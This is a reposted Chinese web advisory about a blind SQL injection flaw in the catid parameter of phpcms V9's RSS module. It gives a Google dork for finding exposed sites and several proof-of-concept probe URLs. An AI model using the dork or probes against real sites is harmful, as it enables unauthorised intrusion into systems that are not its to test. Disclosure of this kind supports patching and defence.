首页 > 网络安全

phpcms V9 BLind SQL 注入漏洞0day

番茄系统家园 · 2022-03-15 00:42:39

  影响版本:phpcms v9 blind

  官方网站:http://www.phpcms.cn

  漏洞类型:SQL注入

  漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。

  google dork:inurl:"index.php?m=content+c=rss+catid=10"

  exploit & p0c

  [!] index.php?m=content&c=rss&catid=[valid catid]

  Example p0c

  [!] http://host/index.php?m=content&c=rss&catid=10

  [!] http://host/index.php?m=content&c=rss&catid=-10

  [+] http://host/index.php?m=content&c=rss&catid=5

 

免责声明: 凡标注转载/编译字样内容并非本站原创,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如果你觉得本文好,欢迎推荐给朋友阅读;本文链接: https://m.nndssk.com/wlaq/191640wfkiuf.html
猜你喜欢
最新应用
TapTap V2.84.0 手机版

TapTap V2.84.0 手机版

下载
软天空游戏盒应用

软天空游戏盒应用

下载
软天空游戏大全App

软天空游戏大全App

下载
菜鸡游戏不用排队版

菜鸡游戏不用排队版

下载
软天空游戏盒子手机版

软天空游戏盒子手机版

下载
软天空游戏盒正式版

软天空游戏盒正式版

下载
软天空游戏盒子app

软天空游戏盒子app

下载
软天空游戏盒子App

软天空游戏盒子App

下载
软天空游戏

软天空游戏

下载
菜鸡游戏App

菜鸡游戏App

下载
玩GO

玩GO

下载
好游快爆软件

好游快爆软件

下载
菜鸡游戏

菜鸡游戏

下载
葫芦侠App

葫芦侠App

下载
第五人格盒子软件

第五人格盒子软件

下载
热门应用
快手大屏版

快手大屏版

下载
嘿咻漫画

嘿咻漫画

下载
快狐短视频

快狐短视频

下载
微信

微信

下载
钢琴助手手机版

钢琴助手手机版

下载
钢琴助手最新版

钢琴助手最新版

下载
2345游戏盒

2345游戏盒

下载
北京交通app停车缴费

北京交通app停车缴费

下载
光环助手oppo版最新

光环助手oppo版最新

下载
精准天气预报几点几分

精准天气预报几点几分

下载
飞信

飞信

下载
华为鸿蒙os2.0系统

华为鸿蒙os2.0系统

下载
messenger free

messenger free

下载
海棠书屋自由阅读的小说阅读网

海棠书屋自由阅读的小说阅读网

下载
QQ

QQ

下载